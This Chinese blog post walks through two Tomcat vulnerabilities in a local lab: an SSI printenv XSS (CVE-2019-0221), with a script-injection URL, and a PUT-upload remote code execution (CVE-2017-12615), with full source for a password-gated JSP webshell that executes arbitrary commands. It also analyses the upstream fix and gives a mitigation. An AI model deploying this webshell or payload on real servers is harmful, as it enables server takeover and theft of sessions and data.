我成功攻擊了Tomcat服務(wù)器，大佬們的反應(yīng)亮了

Tomcat是一個(gè)開(kāi)源的輕量級(jí)Web應(yīng)用服務(wù)器，在我們平常工作過(guò)程中接觸得非常多。代碼也非常經(jīng)典，很多人為了提升自己的技術(shù)也會(huì)去閱讀學(xué)習(xí)Tomcat的源碼。但正如著名詩(shī)人李白所說(shuō)的：世界上本沒(méi)有漏洞，使用的人多了，也就發(fā)現(xiàn)了漏洞。比如今年的2月份就爆出了存在文件包含漏洞。今天我們選擇兩個(gè)比較直觀的Tomcat漏洞去模擬整個(gè)漏洞被攻擊的過(guò)程，以及漏洞為什么會(huì)產(chǎn)生，Tomcat大神們又是如何應(yīng)對(duì)的。

一、SSI技術(shù)說(shuō)明

首先演示的漏洞和Tomcat的SSI功能有關(guān)，SSI是什么

SSI技術(shù)，也叫作Serve Side Includes，SSI（服務(wù)器端包含）是放置在HTML頁(yè)面中的指令，并在服務(wù)頁(yè)面時(shí)在服務(wù)器上對(duì)其進(jìn)行評(píng)估。它們使您可以將動(dòng)態(tài)生成的內(nèi)容添加到現(xiàn)有的HTML頁(yè)面，而不必通過(guò)CGI程序或其他動(dòng)態(tài)技術(shù)來(lái)提供整個(gè)頁(yè)面。使用SSI技術(shù)文件默認(rèn)的后綴名為.shtml； 

舉例：我們可以將指令放置到現(xiàn)有的HTML頁(yè)面中，例如：

!--#echo var="DATE_LOCAL" -->

當(dāng)該頁(yè)面被執(zhí)行時(shí)，將會(huì)顯示如下結(jié)果

Sunday, 22-March-2020 18:28:54 GMT

SSI最常見(jiàn)的用途之一：輸出CGI程序的結(jié)果，例如``命中計(jì)數(shù)器''。關(guān)于該技術(shù)更為詳細(xì)的說(shuō)明參見(jiàn)：http://httpd.apache.org/docs/current/howto/ssi.html

二、為T(mén)omcat開(kāi)啟SSI

1. 準(zhǔn)備好JRE、tomcat環(huán)境，我選擇的是“apache-tomcat-9.0.10” （該漏洞受影響的版本有：Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 ）

2. 修改conf/context.xml第19行，開(kāi)啟權(quán)限

<Context privileged="true">

3. 修改conf\web.xml，開(kāi)啟SSI Servlet。該段代碼默認(rèn)是被注釋掉的，我們刪除注釋即可，代碼在310-322行。

<servlet> <servlet-name>ssi</servlet-name> <servlet-class> org.apache.catalina.ssi.SSIServlet </servlet-class> <init-param> <param-name>buffered</param-name> <param-value>1</param-value> </init-param> <init-param> <param-name>debug</param-name> <param-value>0</param-value> </init-param> <init-param> <param-name>expires</param-name> <param-value>666</param-value> </init-param> <init-param> <param-name>isVirtualWebappRelative</param-name> <param-value>false</param-value> </init-param> <load-on-startup>4</load-on-startup> </servlet>

去掉關(guān)于ssi配置的注釋 422-425行

 <servlet-mapping> <servlet-name>ssi</servlet-name> <url-pattern>*.shtml</url-pattern> </servlet-mapping>

4. 在根目錄下添加madashu_env.shtml（習(xí)慣性命名為printEnv.shtml）文件，位于webapps/ROOT/ssi/

<html><head><title></title><body>Echo: <!--#echo var="QUERY_STRING_UNESCAPED" --><br/><br/>Env: <!--#printenv --></body></html>

5. 啟動(dòng)Tomcat即可

三、發(fā)起攻擊

1. 我們輸入以下url看下效果

http://localhost:8080/ssi/madashu_env.shtml?%3Cbr/%3E%3Cbr/%3E%3Ch1%3EHello%20Tomcat%EF%BC%8C%E7%A0%81%E5%A4%A7%E5%8F%94%E5%88%B0%E6%AD%A4%E4%B8%80%E6%B8%B8%3C/h1%3E%3Cbr/%3E%3Cbr/%3E

2. XSS注入

http://localhost:8080/ssi/madashu_env.shtml?%3Cscript%3Ealert(%27Hello%20Tomcat%EF%BC%8C%E7%A0%81%E5%A4%A7%E5%8F%94%E5%88%B0%E6%AD%A4%E4%B8%80%E6%B8%B8%27)%3C/script%3E

攻擊成功，頁(yè)面展示如下。

通過(guò)這種方式我們使用戶加載并執(zhí)行攻擊者惡意制造的網(wǎng)頁(yè)程序，攻擊者還可能得到包括但不限于更高的權(quán)限（如執(zhí)行一些操作）、私密網(wǎng)頁(yè)內(nèi)容、會(huì)話和cookie等各種內(nèi)容。

四、源碼分析

漏洞產(chǎn)生后，Tomcat大神們迅速修復(fù)了該漏洞，我們從Github上找到當(dāng)時(shí)的代碼修復(fù)提交記錄：

https://github.com/apache/tomcat/commit/15fcd166ea2c1bb79e8541b8e1a43da9c452ceea

說(shuō)真的，當(dāng)時(shí)看到這段修復(fù)代碼我是驚呆了，這是什么騷操作！?。　癳ntity”又是什么鬼?。?！

于是接下往下翻代碼

這個(gè)地方將我們輸入的變量值直接輸出到了網(wǎng)頁(yè)，很明顯剛剛的entity應(yīng)該是進(jìn)行了轉(zhuǎn)碼。我們找到SSIMediator.java文件，路徑org.apache.catalina.ssi. SSIMediator

這樣我們一下子就明白過(guò)來(lái)了，當(dāng)發(fā)現(xiàn)是“entity”編碼，會(huì)將輸入的內(nèi)容進(jìn)行Escape，從而避免了XSS。
估計(jì)大神們當(dāng)時(shí)也是緊急出了個(gè)hotfix版本，直接把參數(shù)寫(xiě)死成“entity”。還有作為Web服務(wù)器，大神們竟然也會(huì)犯這么低級(jí)別的錯(cuò)誤，所以這也解釋了為什么不存在0Bug的系統(tǒng)，哈哈！去翻看最新的SSIPrintenv.java文件，已經(jīng)把“entity”定義成常量了，這才專業(yè)嘛！

接下來(lái)再簡(jiǎn)單演示下遠(yuǎn)程代碼執(zhí)行漏洞，該漏洞為高危漏洞，即使是非默認(rèn)配置，但是一旦存在漏洞，那么攻擊者可以成功上傳 Webshell，并控制服務(wù)器。

1. 通過(guò)put方式上傳文件，請(qǐng)求進(jìn)行中時(shí)進(jìn)行攔截：

2. 生成惡意文件，取名叫jiansheng.jsp

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>

3. 遠(yuǎn)程上傳成功，接下來(lái)就可以愉快地在這個(gè)不屬于我們自己的tomcat里玩耍了

整個(gè)代碼也是比較簡(jiǎn)單的，可以翻看JspServlet.java，這里就不做演示了。

說(shuō)明：該漏洞影響范圍非常廣，從 5.x 到 9.x 全部中槍。最好的解決方式是將 conf/web.xml 中對(duì)于 DefaultServlet 的 readonly 設(shè)置為 true。

【結(jié)語(yǔ)】興趣是最好的老師，我們通過(guò)去看大佬們掉過(guò)的坑，寫(xiě)過(guò)的代碼，站在巨人的肩膀人可以更快速地提升自己。有興趣的小伙伴可以去看看Tomcat已爆出的漏洞：

http://tomcat.apache.org/security-9.html
本次演示的兩個(gè)漏洞分別是CVE-2019-0221，CVE-2017-12615。

特別推薦一個(gè)分享架構(gòu)+算法的優(yōu)質(zhì)內(nèi)容，還沒(méi)關(guān)注的小伙伴，可以長(zhǎng)按關(guān)注一下：
長(zhǎng)按訂閱更多精彩▼
如有收獲，點(diǎn)個(gè)在看，誠(chéng)摯感謝